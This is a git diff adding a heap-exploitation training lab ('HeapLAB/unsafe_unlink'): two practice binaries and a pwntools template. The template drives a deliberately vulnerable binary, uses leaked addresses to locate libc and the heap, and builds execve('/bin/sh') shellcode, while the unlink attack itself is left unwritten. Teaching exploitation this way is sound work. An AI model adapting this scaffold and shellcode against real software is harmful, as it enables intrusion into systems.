diff options
Diffstat (limited to 'HeapLAB/unsafe_unlink')
| -rwxr-xr-x | HeapLAB/unsafe_unlink/demo | bin | 0 -> 9328 bytes | |||
| -rwxr-xr-x | HeapLAB/unsafe_unlink/pwntools_template.py | 72 | ||||
| -rwxr-xr-x | HeapLAB/unsafe_unlink/unsafe_unlink | bin | 0 -> 16072 bytes |
3 files changed, 72 insertions, 0 deletions
diff --git a/HeapLAB/unsafe_unlink/demo b/HeapLAB/unsafe_unlink/demo Binary files differnew file mode 100755 index 0000000..201b741 --- /dev/null +++ b/HeapLAB/unsafe_unlink/demo diff --git a/HeapLAB/unsafe_unlink/pwntools_template.py b/HeapLAB/unsafe_unlink/pwntools_template.py new file mode 100755 index 0000000..8dd9d69 --- /dev/null +++ b/HeapLAB/unsafe_unlink/pwntools_template.py @@ -0,0 +1,72 @@ +#!/usr/bin/python3 +from pwn import * + +elf = context.binary = ELF("unsafe_unlink") +libc = elf.libc + +gs = ''' +continue +''' +def start(): + if args.GDB: + return gdb.debug(elf.path, gdbscript=gs) + else: + return process(elf.path) + +# Index of allocated chunks. +index = 0 + +# Select the "malloc" option; send size. +# Returns chunk index. +def malloc(size): + global index + io.send("1") + io.sendafter("size: ", f"{size}") + io.recvuntil("> ") + index += 1 + return index - 1 + +# Select the "edit" option; send index & data. +def edit(index, data): + io.send("2") + io.sendafter("index: ", f"{index}") + io.sendafter("data: ", data) + io.recvuntil("> ") + +# Select the "free" option; send index. +def free(index): + io.send("3") + io.sendafter("index: ", f"{index}") + io.recvuntil("> ") + +io = start() + +# This binary leaks the address of puts(), use it to resolve the libc load address. +io.recvuntil("puts() @ ") +libc.address = int(io.recvline(), 16) - libc.sym.puts + +# This binary leaks the heap start address. +io.recvuntil("heap @ ") +heap = int(io.recvline(), 16) +io.recvuntil("> ") +io.timeout = 0.1 + +# ============================================================================= + +# =-=-=- EXAMPLE -=-=-= + +# Prepare execve("/bin/sh") shellcode with a jmp over where the fd will be written. +shellcode = asm("jmp shellcode;" + "nop;"*0x16 + "shellcode:" + shellcraft.execve("/bin/sh")) + +# Request a small chunk. +small_chunk = malloc(0x88) + +# Edit the small chunk. +edit(small_chunk, "X"*32) + +# Free the small chunk. +free(small_chunk) + +# ============================================================================= + +io.interactive() diff --git a/HeapLAB/unsafe_unlink/unsafe_unlink b/HeapLAB/unsafe_unlink/unsafe_unlink Binary files differnew file mode 100755 index 0000000..190fe07 --- /dev/null +++ b/HeapLAB/unsafe_unlink/unsafe_unlink |